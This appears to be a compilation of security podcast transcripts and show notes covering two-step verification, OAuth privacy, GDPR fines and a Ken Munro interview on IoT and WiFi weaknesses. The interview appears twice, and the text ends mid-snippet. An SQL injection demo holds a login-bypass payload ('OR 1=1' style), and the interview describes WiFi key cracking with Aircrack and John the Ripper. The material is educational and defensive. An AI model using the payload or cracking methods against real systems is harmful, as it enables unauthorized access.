What's the difference between two-factor authentication and two-step verification, in terms of increasing usability?
Per Thorsheim
Two-step verification process is what I consider to be a good trade-off between good security and good usability. With two-step verification, which is what Facebook and Twitter and Google does in most cases, is that you will do the initial setup process of your account and an initial setup of your two-factor authentication procedure, like, once, to log in, using the Facebook app on your phone, on your iPad. Maybe you're using the browser on your computer. And you do this authentication with username, password, and entering the additional code once per device or per app that you're using or maybe for each and every single web browser on different computers that you may be using.
And as soon as you've done that, Facebook will remember the different browsers and apps you have used, and then, you know, they are already pre-approved. So then next time you log in, you only type in your username and password, which reduces complexity and time for you. But still they remember your browser, so they see that, "Oh, yep, that's Per logging in from a browser that he had already used before, so we know that this browser probably belongs to Per. And as long as the username and password is correct, he gets access to his Facebook account." The two-factor authentication process, I would have to enter that additional code every single time I log on, and that's the difference between the two-step verification and the two-factor authentication.
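A minimal sketch of how such a "remembered device" check might work, assuming an HMAC-signed device token stored as a cookie (purely an illustration; this is not how Facebook or any specific service actually implements it):

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # known only to the service

def issue_device_token(user_id: str) -> str:
    """Issued once, after a full username + password + one-time-code login."""
    device_id = secrets.token_hex(16)
    sig = hmac.new(SERVER_SECRET, f"{user_id}:{device_id}".encode(), hashlib.sha256).hexdigest()
    return f"{user_id}:{device_id}:{sig}"  # handed back as a long-lived cookie

def device_is_remembered(token: str, user_id: str) -> bool:
    """On later logins, a valid token lets the service skip the second factor."""
    try:
        tok_user, device_id, sig = token.split(":")
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{tok_user}:{device_id}".encode(), hashlib.sha256).hexdigest()
    return tok_user == user_id and hmac.compare_digest(sig, expected)

cookie = issue_device_token("per")
print(device_is_remembered(cookie, "per"))    # True: only the password is asked for
print(device_is_remembered(cookie, "cindy"))  # False: full two-step login required
```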
Cindy Ng
What if I decide to delete my cookies?
Per Thorsheim
Well, then it's all gone. Then you have to do the setup process again, and this applies when you're using your web browser. But if you are using the official Facebook app for iOS or for Android, as an example, these features are built into the application. In that setting, it's not just a standard cookie. There's slightly different security built into the app. But, of course, you can do the equivalent on the app as well and basically delete your cookie.
Cindy Ng
You would essentially have to do a risk analysis on yourself to figure out what the trade-off is in that regard.
Per Thorsheim
Yeah, absolutely. You know, when I go traveling abroad, I go to many different countries, and some of them may be, well, should I say, a little less democratic and a little more hostile, perhaps, than others. So I do my personal risk analysis on wherever I go, do I need a strong PIN code? Do I need a strong password? Should I be using two-factor authentication? And this is a risk analysis, and it's also trade-off for the usability. I'm just like, I guess, everybody. I want security to be good, but I'm not willing to sacrifice too much of the usability in order to keep up good security, because then I will probably stop using the service if I'm forced to be compliant with all kinds of security requirements all the time, when there's, you know, from my perspective, no point in doing so.
Cindy Ng
Let's also talk about other security options, such as OAuth. Tell us a little bit more about the pros and cons of using that as an option to log in.
Per Thorsheim
Well, it solves many problems, especially in terms of usability. I can go to an online store here in Norway, and I'll want to purchase myself a new computer, or maybe I would like to order tickets to the movie theater to go with somebody to watch a movie, as an example. And instead of having to sign up for an account, I can use what we call a social login, where they are using OAuth in the background, and you basically sign up using your Facebook account. Now, from a usability perspective, this is very easy to do.
The privacy concerns about this is the fact that Facebook will be getting access to information like you went to the movie theater, and they will maybe be able to find out which movie you actually went to see and how many tickets you've purchased. I don't know. Maybe they can. And the movie theater, they will also get information from Facebook about me, who I am, my age, my gender, maybe some other pieces of information as well. And in my opinion, the movie theater shouldn't be asking me, you know, who I am or anything. You know, I want to see a movie. I'm not going to make any trouble for them, and I'm going to pay for the tickets, and that's it. There are lots of privacy concerns about this, at least from my perspective. And I am a little bit concerned that most people, they don't really realize how much information they actually give away about themselves when they are using this kind of authentication to all kinds of services around.
Cindy Ng
You're really speaking to data minimization, which is part of the "Privacy by Design" guideposts: collect what you really need, not every single thing. When you go to the movies, they don't need to know every single friend that you have on Facebook, for instance.
Per Thorsheim
Yeah, and, of course, from a marketing perspective, I can see that they actually have an interest in knowing this about you. But, you know, the movie theater, they don't give me a discount when I provide lots of personal information about myself, compared to those who just purchase a ticket and pay in cash. They remain completely anonymous, so to speak, to the movie theater, while I'm paying the same price but at the same time also giving them information about my age, address, phone number, email address, gender, a lot of pieces of information. In one way, I would say that if they would give me a discount, maybe I would be interested in giving away more personal information about myself.
It's going to be interesting when the GDPR actually comes into force. I still have my concerns about the GDPR. It's an EU regulation, so it will be implemented in the different countries of the EU and also in Norway. We are not actually a member of the European Union, but the GDPR will still be put into our laws and regulations as well. And the most important aspect of the GDPR, in my opinion, is that if you are a service provider of any type and you suffer a data breach of personally identifiable information about users, especially if that information is sensitive, that is, regarding sexuality, health, criminal records, political activity, religious activity, membership in workers' unions, as an example, the GDPR says that the company or organization in question can get a fine of up to 4% of their total global yearly revenue.
And, you know, you look at the numbers of Apple and Microsoft and Google, how much revenue they make in a full year, and 4% of that amount is going to be the maximum fine for one single data breach. That's a lot of money. Today, data breach laws here in Norway, as an example, will give you a fine so small that anybody can pay it without any problems at all. So this is a game-changing regulation that is coming into force for the European Union. How it will be interpreted in courts, and how big those fines will actually be, is going to be very interesting to see, starting somewhere in 2018.
Cindy Ng
Yeah, it'll be a challenge to see how they can enforce it when US companies do business in Norway or any of the EU countries.
Per Thorsheim
Well, absolutely. I mean, there have been attempts to set up agreements between European Union and the US, as an example, for Cloud services from Google, from Apple, from Microsoft and so on that will regulate how US companies are to handle data about European citizens and also whether the US government can get access to that data or not. And these are, as far as I know, still ongoing discussions, of course, but there are also laws and regulations and agreements already in place on this. That applies, again, to how US companies are handling data about European citizens stored on computers in Europe.
Cindy Ng
Let's talk about hardware. What do you think about things like the YubiKey and RSA tokens? How effective is having hardware in...
Per Thorsheim
Well, from the risk analysis perspective, it's a good thing. If I give you an app that you will use on your phone that will provide you with codes that you need to log in, somebody would either have to steal your phone. They could eventually trick you, talk you into giving them the code from your app by, you know, calling you and say, "Hey, this is from Microsoft Support in India, and we are calling to make you aware that you have some problems with your account. We need to verify your account by having you read up the present token number that you have on your phone at the moment."
But, in general, from a risk analysis perspective, having a hardware token is a good thing, security-wise. And it's much better than using just an app or receiving a text message by SMS, because an app is a piece of software that may have vulnerabilities, and SMS messages are essentially sent in the clear. We know from assessed vulnerabilities in the worldwide mobile networks that they can be intercepted, and they can also be routed through hostile servers, where an adversary can read them in plain text and then get access to your account. If you have a handheld device, maybe with a small screen and no connectivity at all, that just generates a new code every 30 seconds or 1 minute or 5 minutes, like RSA SecurID, it's much harder for an attacker to get access to those codes. They would either have to trick you, or they would have to steal that physical token from you.
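For a sense of how such time-based codes are generated, here is a minimal sketch of the open TOTP standard (RFC 6238). RSA SecurID itself uses a proprietary algorithm, so this is only a stand-in, and the shared secret below is just an example value:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Generate the current time-based one-time code from a shared secret."""
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // interval           # rolls over every 30 seconds
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

# Token and server each hold the same secret; no connectivity is needed,
# because both sides derive the code from the current time alone.
print(totp("JBSWY3DPEHPK3PXP"))
```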
Cindy Ng
It's interesting how social engineering can happen with hardware that's supposed to protect us too.
Like many in IT, you can probably commiserate with this week’s Inside Out Security Show panel – Cindy Ng, Mike Buckbee and Alan Cizenski – on elaborating when someone asks you, “What Do You Do for a Living?” Whether you’re a programmer or a sysadmin, the scope of your role is often multi-faceted and complex.
In this episode, we talk about various roles and responsibilities of those in IT - differentiating similar tools, testing and evaluating, balancing practical decision making, and much more.
On election day, I stumbled upon an article that described presidential candidates’ newfound ability to influence voters with big data. Not health, financial or sensitive data, but data from loyalty cards, gym memberships etc.
Rather than a financial exchange, the end goal of using big data to influence end users would be a vote on November 4th.
What a fascinating use of data!
I had to get responses from the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Mike Buckbee, and Forrest Temple. They engaged in a lively discussion on the pros and cons of leveraging big data in a presidential election, the significance of data integrity, as well as the controversies on the ability to re-identify anonymized data.
Lastly, in our “Tool for Sysadmins” segment, Buckbee shares PowerForensics. By the way, we also discuss when it’s worthwhile to script and when it’s worth forking over a check to get security done right.
In the next part of our discussion, data privacy attorney Sheila FitzPatrick gets into the weeds and talks to us about her work in setting up Binding Corporate Rules (BCRs) for multinational companies. These are actually the toughest rules of the road for data privacy and security.
What are BCRs?
They allow companies to internally transfer EU personal data to any of their locations in the world. The BCR agreement has to get approval from a lead national data protection authority (DPA) in the EU. FitzPatrick calls them a gold standard in compliance—they’re tough, comprehensive rules with a clear complaint process for data subjects.
Another wonky area of EU compliance law she has worked on is agreements for external data transfers between companies and third-party data processors. Note: it gets even trickier when dealing with cloud providers.
This is a fascinating discussion from a working data privacy lawyer.
And it’s great background for IT managers who need to keep up with the lawyerly jargon while working with privacy and legal officers in their company!
Earlier this month at the awesome O’Reilly Security Conference, I learned from world-leading security pros about the most serious threats facing IT. Hmm, sounds like that would make a great topic to discuss with the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Kris Keyser, and Peter TerSteeg.
Let’s go meta. According to expert Becky Bace, you can generalize security challenges as a cycle of new attacks and vulnerabilities, requiring damage control and remedies, and then followed by newer and smarter attacks.
It’s always kind of the same problem, but dressed up a little differently each time.
Moreover, in the latest 2016 Deloitte-National Association of State Chief Information Officers (NASCIO) Cybersecurity Study, 80% of the respondents say inadequate funding is one of the top barriers to effectively addressing cybersecurity threats.
That led me to wonder, how can we get more funding and stretch existing dollars for the Infosec department?
Our panelists discussed ways in which we can help businesses make and save money, the costs of a breach, and whether or not organizations should get cyberinsurance.
And towards the end of the show, we played make-believe IT department and pretended we got extra budget for our team.
Finally, we enjoyed a lighthearted IT moment as we discussed this tell-all article, 25 Infosec Gurus Admit to their Mistakes…and What They Learned from Them.
In this episode of the Inside Out Security Show, the panel – Cindy Ng, Mike Buckbee and Mike Thompson – shared their thoughts on the latest botnet attack.
“This botnet attack that happened recently that brought down the DNS services. That’s probably unfortunately the first of many,” warns Mike Thompson. His concerns also launched the group into discussing the challenges of balancing innovation alongside security and privacy.
We ended the show with a few tools Buckbee recommended, “The big DDoS attack that happened, it was really targeted at a company called Dyn…It was the DNS that indicated where the traffic should go that was messed up, at the DNS provider level…A lot of times, it happens at a local level…it’s really easy to mess up your own DNS. A very useful tool: What’s my DNS”
Listen in if you wanna know the very first security precaution Thompson takes when he gets a new router. You'll also learn who out of the group has embraced IoT devices with open arms.
Since October was Cyber Security Awareness month, we decided to look at what’s holding back our efforts to make security—to coin a phrase—“great again”.
In this episode of the Inside Out Security Show, the panel – Cindy Ng, Kilian Englert, Kris Keyser, and Mike Buckbee – shared their thoughts on insider threats as discussed on a recent Charlie Rose show, the brilliant but evil use of steganography (the practice of concealing a file, message, image, or video within another file, message, image, or video), and the dark market for malware hidden in underground forums.
For a taste of the podcast, here are a few data security ideas and quotes from our panelists.
Insider Threat. According to Keyser, an insider attack might not necessarily be the fault of employees. It could be that a hacker obtained their credentials – by guessing or pass-the-hash – and the attack was executed under their name. So don’t make an employee the ‘fall guy’ for what was really an outsider. Blame IT instead. Kidding!
Steganography. On hackers hiding credit card information in images, Keyser says, “It’s reminiscent of the skimmer attack you might find on an ATM or a card reader at a shop you go to, but it’s applying that same concept to data, the nonphysical world.”
Like the rest of us, Englert was fascinated by the use of steganography. Englert says, “It’s always been kind of an interesting concept that I played with just for fun, but to see this used as an exfiltration method, it’s terrifying and it’s also brilliant. Having the website serve up the information you’re stealing, publicly, hidden in image files, it’s such a great way to get data out.”
What will hackers think up next?
Underground Forums. Englert thinks these underground sites are fulfilling a market need. He says, “Why not be enterprising? Makes sense from a business perspective. It’s not moral, but a way to make money.” Hackers are certainly displaying an entrepreneurial spirit.
Thinking Like a Hacker
With DDoS attacks on the rise (up 125% in 2016), Buckbee shares what he learned from Marek Majkowski’s presentation, “Are DDoS attacks a threat to the decentralized internet?” A united Internet makes us strong, and with a divided one we may fall.
A Tool for Sysadmins
Mosh (mobile shell) is a remote terminal application that supports intermittent connectivity, allows roaming, and speculatively and safely echoes user keystrokes for better interactive response over high-latency paths.
We have more Ken Munro in this second part of our podcast. In this segment, Ken tells us how he probes wireless networks for weaknesses and some of the tools he uses.
One takeaway for me is that the PSKs or passwords for WiFi networks should be quite complex, probably at least 12 characters. The hackers can crack hashes of low-entropy WiFi keys, which they can scoop up with wireless scanners.
Ken also shares some thoughts on why consumer IoT devices will continue to be hackable. Keep in mind that his comments on security and better authentication carry over quite nicely to the enterprise world.
Could you talk more about your work with these gadgets?
Ken: Yeah, so where they're interesting to us is that in the past, getting hold of decent research equipment to investigate used to be very expensive. But now that the Internet of Things has emerged, we're starting to see low-cost consumer goods with low-cost chip sets, low-cost hardware, and low-cost software emerging at a price point that the average Joe can go and buy and put into their house.
A large company, if they buy technologies, has probably got the resources to think about assessing their security … And put some basic security measures around. But average Joe hasn't.
So what we wanted to do was try and look to see how good the security of these devices was, and almost without exception, the devices we've been looking at have all had significant security flaws!
The other side of it as well, actually, it kind of worries me. Why would one need a wireless tea kettle?
IOS: Right. I was going to ask you that. I was afraid to. Why do you think people are buying these things? The advantage is that you can, I guess, get your coffee while you're in the car and it'll be there when you get home?
Ken: No. It doesn't work like that …Yeah, that's the crazy bit. In the case of the WiFi kettle, it only works over WiFi. So you've got to be in your house!
IOS: Okay. It's even stranger.
Ken: Yeah, I don't know about you but my kitchen isn't very far away from the rest of my house. I'll just walk there, thanks.
IOS: Yeah. It seems that they were just so lacking in some basic security measures … they left some really key information unencrypted. What was the assumption? That it would just be used in your house and that it would be impossible for someone to hack into it?
Ken: You're making a big step there, which is assuming that the manufacturer gave any thought to an attack from a hacker at all. I think that's one of the biggest issues right now is there are a lot of manufacturers here and they're rushing new product to market, which is great. I love the innovation.
I'm a geek. I like new tech. I like seeing the boundaries being pushed. But those companies are rushing technologies to market without really understanding the security risk. You're completely exposing people's homes, people's online lives by getting it wrong.
IOS: Right. I guess I was a little surprised. You mentioned in your blog something called wigle.net?
Ken: Yeah, wigle is …. awesome and that's why WiFi's such a dangerous place to go.
IOS: Right.
Ken: Well, there's other challenges. It's just the model of WiFi -- which is great, don't get me wrong -- when you go home with your cell phone, your phone connects to your WiFi network automatically, right?
Now, the reason it can do that is by sending what are called client probe requests. That's your phone going, "Hey, WiFi router, are you there? Are you there? Are you there?"
Of course, when you're out and about and your WiFi's on, it doesn't see your home WiFi router. But when you get home, it goes, "Are you there?" "Yeah, I'm here," and it does the encryption and all your traffic's nice and safe.
What wigle does — I think it stands for wireless integrated geographic location engine, which is crazy … security researchers have been out with wireless sniffers, scanners, and mapped all the GPS coordinates of all the wireless devices they see.
And then they collate that onto wigle.net, which is a database of these that you can query by wireless network name … and work out where they are.
So it's really easy. You can track people using the WiFi on their phones using wigle.net. You can find WiFi devices. A great example of that was how we found the iKettle: you can search wigle.net for kettles. It's crazy!
IOS: Yeah, I know. I was stunned. I had not seen this before. I suspect some of the manufacturers would be surprised if they saw this. We see the same thing in the enterprise space and IT. I'm just sort of surprised that there are so many tools and hacking tools out there.
But in any case, I think you mentioned that some of these devices start up as an access point and that, in that case, you know the default access name of the iKettle or whatever the device is, and then you could spot it.
Is this the way the hackers work?
Ken: No, that's right. The issue with an IoT WiFi device is that when you first put it up, you need to get through a process of connecting to it and connecting it to your home WiFi network.
And that is usually a two-stage process. Usually. It depends. Some devices don't do this but most devices, say, the iKettle, will set itself up as an access point first or a client-to-client device, and then once you go in and configure it with your cell phone, it then switches into becoming a client on your WiFi network. And it's going through that set of processes where we also found issues and that's where you can have some real fun.
IOS: Right. I think you took the firmware of one of these devices and then was able to figure out, let's say, like a default password.
Ken: Yeah. That's another way. It's a completely different attack. So that's not what we'll do in the iKettle. We didn't need to go near the firmware.
But a real game changer with IoT devices is that the manufacturer is putting their hardware in the hands of their customers … Let's say you're a big online retailer. Usually you bring customers in through an application and they buy stuff.
With the Internet of Things, you're actually putting your technology -- your kit, your hardware, your firmware, your software — into the hands of your consumers.
If you know what you're doing, there are great things you can do to analyze the firmware. You can extract it off the devices, and going through that process, you can see lots of useful data. It's a real game changer, unlike a web application where you can protect it with a firewall … With the Internet of Things, you put your chips into the hands of your customers, and they can potentially do stuff with that if you haven't got security right.
IOS: Right. Did you talk about how they should have encrypted the firmware or protected it in some way? Is that right?
Ken: Yeah. Again, that's good practice. In security, we talk about having layers of defense, what we call defense in depth so that if any one layer of the security chain is broken, it doesn't compromise the whole device.
And a great example for getting that right would be to make sure you protect the firmware. So you can digitally sign the code so that only valid code can be loaded onto your device. That's a very common problem in design where manufacturers haven't looked at code signing and therefore we can upload rogue code.
A good example of that was the Ring doorbell. Something that's attached to the outside of your house. You can unscrew it. You can walk off with it. And we found one bug whereby you can easily extract the WiFi key from the doorbell!
Again, the manufacturer fixed that really quickly, which is great, exactly what we want to see, but our next step is looking at it and seeing if we can take the doorbell, upload a rogue code to it, and then put it back on your door.
So we've actually got a back door on your network.
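The code-signing idea Ken described a moment ago could be sketched roughly like this, using Ed25519 signatures via the third-party `cryptography` package (an illustration only; a real device would bake the vendor's public key into its boot code and verify every image before flashing):

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Vendor side: the private signing key never leaves the build infrastructure.
signing_key = Ed25519PrivateKey.generate()
firmware = b"\x7fELF...hypothetical firmware image..."
signature = signing_key.sign(firmware)

# Device side: only the public key ships on the hardware.
public_key = signing_key.public_key()

def accept_update(image: bytes, sig: bytes) -> bool:
    """Flash the image only if its signature verifies against the vendor key."""
    try:
        public_key.verify(sig, image)
        return True
    except InvalidSignature:
        return False

print(accept_update(firmware, signature))                   # True: genuine build
print(accept_update(b"rogue backdoored image", signature))  # False: rejected
```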
IOS: Right, I know. Very scary. Looking through your blog posts, there were a lot of consumer devices, but then there was one that was in, I think, more of a borderline area, and it was ironically a camera. It could potentially be a security camera. Was that the one where you got the firmware?
Ken: Yeah, that was an interesting one. We've been looking at some consumer grade CCTV cameras, although we see these in businesses as well. And we've particularly been looking at the cameras themselves and also the digital video recorders, the DVRs where they record their content onto.
So many times we find someone has accidentally put a CCTV camera on the public Internet. You've got a spy cam into somebody's organization! The DVR that records all the content, sometimes they put those on the Internet by mistake as well. Or you find the manufacturer built it so badly that it goes online by itself, which is just crazy.
IOS: Yeah, there are some stunning implications, just having an outsider look into your security camera. But you showed you were able to, from looking at the...it was either the firmware or once you got into the device, you could then get into the network. Was that right?
Ken: Yeah, that's quite ironic really, isn't it? A CCTV camera, you consider it to be a security device. And what we found is that not just the camera but also the DVR, if you put it on your network … it can create a backdoor onto your network as well. So you put on a security device that makes you less secure.
IOS: One of the things you do in your assessments is wireless scanning, and you use something, if I'm not mistaken, called Kismet?
Ken: Kismet's a bit old now ... There are lots of tools around, but the Aircrack suite is probably where it's at right now. And that's a really good suite for wireless scanning and wireless key cracking.
IOS: Right. So I was wondering if you could just describe how you do a risk assessment. What would be the procedure using that particular tool?
Ken: Sure. At its most basic, what you'd be looking to do, let's say you're looking at your home WiFi network. Basically, we need to make sure your WiFi is nice and safe. And the security of a WiFi key comes down to how long and complex it is.
It's very easy to grab an encrypted hash of your WiFi key by sitting outside with a WiFi antenna and a tool like Aircrack, which allows you to grab the key. What we then want to do is try and crack that offline. So once I've got your WiFi key, I'm on your network, and we find in a lot of cases that ISP WiFi routers, the default passwords just aren't complicated enough.
And we looked at some of the ISPs in the U.K. and discovered that some of the preset keys, we could crack them on relatively straightforward equipment in as little as a couple of days.
IOS: Okay. That is kind of mind-blowing because I was under the impression that those keys were encrypted in a way that would make it really difficult to crack.
Ken: Yeah, you hope so, but again, it comes down to the length and complexity of the key. If your WiFi network key is only, say, I don't know, eight characters long, it's not really going to stand up to a concerted attack for very long. So again, length and complexity are really important.
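As a rough illustration of why key length and character set matter, here is a quick keyspace calculation (the guess rate below is a made-up number purely for comparison):

```python
import math

def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a randomly chosen key: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)

# 8 lowercase letters vs. 12 characters of mixed case plus digits.
print(round(keyspace_bits(26, 8)))    # ~38 bits
print(round(keyspace_bits(62, 12)))   # ~71 bits

# At a hypothetical 100,000 offline guesses per second, worst-case time to exhaust:
rate = 100_000
for bits in (keyspace_bits(26, 8), keyspace_bits(62, 12)):
    print(f"{2 ** bits / rate / 86400:,.1f} days")
```

The first key falls in a matter of weeks at that rate; the second would take on the order of a billion years, which is the whole argument for longer, more varied keys.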
IOS: Yeah, actually we do see the same thing in the enterprise world, and one of the first recommendations security pros make is that keys and passwords have to be longer, at least eight characters.
Ken: We've been looking at some ... there's also the character set as well. We often find the WiFi router might only have lowercase characters and maybe some numbers in its key, and those numbers and characters are always in the same place in the key. And if you know where they are and you know they're always going to be lowercase, you've reduced the complexity.
IOS: Right.
Ken: So I'd really like to be seeing 12-, 15-, 20-character passwords.
It's not a difficult thing. Every time you get a new smartphone or a new tablet, you have to go and get the key from the router, but really, I think people can cope with longer passwords that they don't use very often, don't you think?
IOS: No, I absolutely agree. We sort of recommend, and we've written about this, that you can...as an easy way to remember longer passwords, you can make up a mnemonic where each letter becomes part of a story. I don't know if you've heard of that technique.
You can get a 10-character password that's easy to remember and therefore becomes a lot harder to crack. We've also written a little bit about some of the cracking tools that are easily available, and I think you mentioned one of them.
Was it John the Ripper?
Ken: John is a password brute force tool and that's really useful. That's great for certain types of passwords. There are other tools for doing different types of password hashes but John is great. Yeah, it's been around for years.
IOS: It's still free.
Ken: But there are lots of other different types of tools that crack different types of password.
IOS: Okay. Do you get the sense that, just going back to some of these vendors who are making these devices, I think you said that they just probably are not even thinking about it and perhaps just not even aware of what's out there?
Ken: Yeah, let's think about it. The majority of start-up entrepreneur organizations that are trying to bring a new IoT device to market, they've probably got some funding. And if they're building something, it's probably going to be going into production nine months ahead.
Imagine you've got some funding from some investors, and just as you're about to start shipping, somebody finds a security bug in your product!
What do you do? Do you stop shipping and your company goes bust? Or do you carry on and trying to deal with the fallout?
I do sympathize with these organizations, particularly if they had no one giving them any advice along the way to say, "Look, have you thought about security?" Because then they're backed into a corner. They've got no choice but to ship or their business goes bankrupt, and they've got no ability to fix the problem.
And that’s probably what happened with the guys who made the WiFi kettle. Some clever guys had a good idea, got themselves into a position where they were committed, and then someone finds a bug and there's no way of backing out of shipping.
IOS: Right, yeah. Absolutely all true. Although we like to preach something called Privacy by Design — at least it’s getting a lot more press than it did a couple years ago — which is just the people at the C-level suite should just be aware that you have to start building some of these privacy and security ideas into the software.
Although it's high-sounding language. And you're right, when it comes to it, a lot of companies, especially start-ups, are really going to be forced to push these products out and then send out an update later, I guess is the idea. Or not. I don't know.
Ken: That's the chance, isn't it?
So if you look at someone like Tesla, they've had some security bugs found last year and they have the ability to do over-the-Internet updates. So the cars can connect over WiFi and all their security bugs were fixed over the air in a two-week period!
I thought that was fantastic.
So if you can update in the field, if you've figured that out, brilliant. But many manufacturers don't have the ability to do updates once their products are in the field. So then you end up in a real fix, because you've got products you can only repair by recalling them, which is a huge cost and terrible PR. So hats off to Tesla for doing it right.
And the same goes for the Ring doorbell. The guys thought about it. They had a process whereby getting updates out was really, really easy, so it was easy to fix, and they patched the bug that we found within about two weeks.
And that's the way it should be. They completely thought about security. They knew they couldn't be perfect from the beginning: "Let's put a capability in place, a mechanism, so we can fix anything that gets found in the field."
IOS: Yes. We're sort of on the same page. Varonis just sees the world where there will always be a way for someone to get into especially newer products and you have to have secondary defenses. And you've talked about some good remediations with longer passwords, and another one we like is two-factor authentication.
Any thoughts on biometric authentication?
Ken: Yes. Given that the majority of IoT devices are controlled by a smartphone, I think it's really key for organizations to think about how they authenticate the customer to a smart device or, if they have a web app, to the web interface as well.
I'm a big fan of two-factor authentication. People get their passwords stolen in breaches all the time. And because they reuse their passwords across multiple different systems, a password stolen from one place means another place gets compromised.
There was a great example, I think, some of the big data breaches ... they got a password stolen in one breach and then someone got their account hacked. It wasn't hacked. They just had reused the password!
IOS: Right.
Ken: So I'm a real fan of two-factor authentication to prevent that happening. Whether it's a one-time SMS to your phone or a different way of doing it, I think two-factor authentication is fantastic for helping the average Joe deal with security more easily. No one's going to have an issue with, "Look, you've sent me an SMS to my phone.
That's another layer of authentication. Great. Fantastic." I'm not so much a fan of biometrics by themselves, and the reason for that is my concern about revocation. If biometric data is actually breached, and companies get breached all the time, it's not like losing passwords, because passwords we throw away and get new ones. But if we lose your biometric, we're in a bit more of a difficult position.
But I do think biometrics work brilliantly when they're combined with things like passwords. A biometric plus a password is fantastic as secure authentication.
IOS: Thanks for listening to the podcast. If you're interested in following Ken on Twitter, his handle is TheKenMunroShow or you can follow his blog at PenTestPartners.com. Thanks again.
Our inspiration for this week's show was Michelle Obama's popular catchphrase, "When they go low, you go high." Don't worry, our next episode will also have a fun Republican catchphrase.
In this episode, we discussed how low the security of our favorite things has gone - in music, email, and the internet of things (IoT).
Music. There are a lot of music lovers that use Spotify on their desktops, but they weren't expecting it to periodically cause their browser to open malicious sites without their permission.
Email. Even though kids these days think email is passé, organizations still rely on it. That's why we must cover Yahoo's 500 million leaked accounts as well as the hacked presidential candidates' emails. (Psst, go to 5:03 if you want to know how much Yahoo would have paid if GDPR - the EU's latest data protection regulation - had been in effect.)
IoT. Lastly, we discussed Mirai, the botnet behind the recent DDoS attack against Brian Krebs, who runs KrebsOnSecurity.com, a publication about cybersecurity.
Thinking Like a Hacker
In this segment, we attempt to explain "SQL Injection" to a 5-year-old.
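For readers a bit older than five, here is a minimal sketch of the difference between a query that is vulnerable to SQL injection and a parameterized one (the table and credentials are made up for the example):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # attacker-supplied "password"

# Vulnerable: the input is glued straight into the SQL string, so the
# OR '1'='1' clause makes the password check pass for any account.
rows = conn.execute(
    f"SELECT * FROM users WHERE name = 'alice' AND password = '{user_input}'"
).fetchall()
print("injected login succeeded:", bool(rows))       # True

# Safe: a parameterized query treats the input as data, never as SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ? AND password = ?", ("alice", user_input)
).fetchall()
print("parameterized login succeeded:", bool(rows))  # False
```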
A Tool for Sysadmins
Fiddler - The free web debugging proxy for any browser, system or platform
If you want to understand the ways of a pen tester, Ken Munro is a good person to listen to. An info security veteran of over 15 years and founder of UK-based Pen Test Partners, he has earned lots of respect from vendors for his work hacking into consumer devices, particularly coffee makers. He’s also been featured on BBC News.
You quickly learn from Ken that pen testers, besides having amazing technical skills, are at heart excellent researchers.
They thoroughly read the device documentation and examine firmware and coding like a good QA tester. You begin to wonder why tech companies, particularly the ones making IoT gadgets, don’t run their devices past him first!
There is a reason.
According to Ken, when you’re a small company under pressure to get product out, especially IoT things, you end up sacrificing security. It’s just the current economics of startups. This approach may not have been a problem in the past, but in the age of hacker ecosystems, and public tools such as wigle.net, you’re asking for trouble.
The audio suffered a little from the delay in our UK-NYC connection, and let’s just say my Skype conferencing skills need work.
Anyway, we join Ken as he discusses how he found major security holes in wireless doorbells and coffee makers that allowed him to get the PSKs (pre-shared keys) of the WiFi networks they’re connected to.
Could you talk more about your work with these gadgets?
Ken: Yeah, so where they're interesting to us is that in the past, getting hold of decent research equipment to investigate used to be very expensive. But now that the Internet of Things has emerged, we're starting to see low-cost consumer goods with low-cost chip sets, low-cost hardware, and low-cost software emerging at a price point that the average Joe can go and buy and put into their house.
A large company, if they buy technologies, has probably got the resources to think about assessing their security … And put some basic security measures around. But average Joe hasn't.
So what we wanted to do was try and look to see how good the security of these devices was, and almost without exception, the devices we've been looking at have all had significant security flaws!
The other side of it as well, actually, it kind of worries me. Why would one need a wireless tea kettle?
IOS: Right. I was going to ask you that. I was afraid to. Why do you think people are buying these things? The advantage is that you can, I guess, get your coffee while you're in the car and it'll be there when you get home?
Ken: No. It doesn't work like that …Yeah, that's the crazy bit. In the case of the WiFi kettle, it only works over WiFi. So you've got to be in your house!
IOS: Okay. It's even stranger.
Ken: Yeah, I don't know about you but my kitchen isn't very far away from the rest of my house. I'll just walk there, thanks.
IOS: Yeah. It seems that they were just so lacking in some basic security measures … they left some really key information unencrypted. What was the assumption? That it would just be used in your house and that it would be impossible for someone to hack into it?
Ken: You're making a big step there, which is assuming that the manufacturer gave any thought to an attack from a hacker at all. I think that's one of the biggest issues right now is there are a lot of manufacturers here and they're rushing new product to market, which is great. I love the innovation.
I'm a geek. I like new tech. I like seeing the boundaries being pushed. But those companies are rushing technologies to market without really understanding the security risk. You're completely exposing people's homes, people's online lives by getting it wrong.
IOS: Right. I guess I was a little surprised. You mentioned in your blog something called wigle.net?
Ken: Yeah, wigle is …. awesome and that's why WiFi's such a dangerous place to go.
IOS: Right.
Ken: Well, there are other challenges. It's just the model of WiFi -- which is great, don't get me wrong -- when you go home with your cell phone, your phone connects to your WiFi network automatically, right?
Now, the reason it can do that is by sending what are called client probe requests. That's your phone going, "Hey, WiFi router, are you there? Are you there? Are you there?"
Of course, when you're out and about and your WiFi's on, it doesn't see your home WiFi router. But when you get home, it goes, "Are you there?" "Yeah, I'm here," and it does the encryption and all your traffic's nice and safe.
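(For readers who want to see what those probe requests look like on the wire, here's a minimal sketch, not something from Ken's toolkit, that listens for them with Python and Scapy. It assumes a wireless card already in monitor mode on an interface named "wlan0mon", and it needs root privileges.)

```python
# Minimal sketch: listen for 802.11 client probe requests with Scapy.
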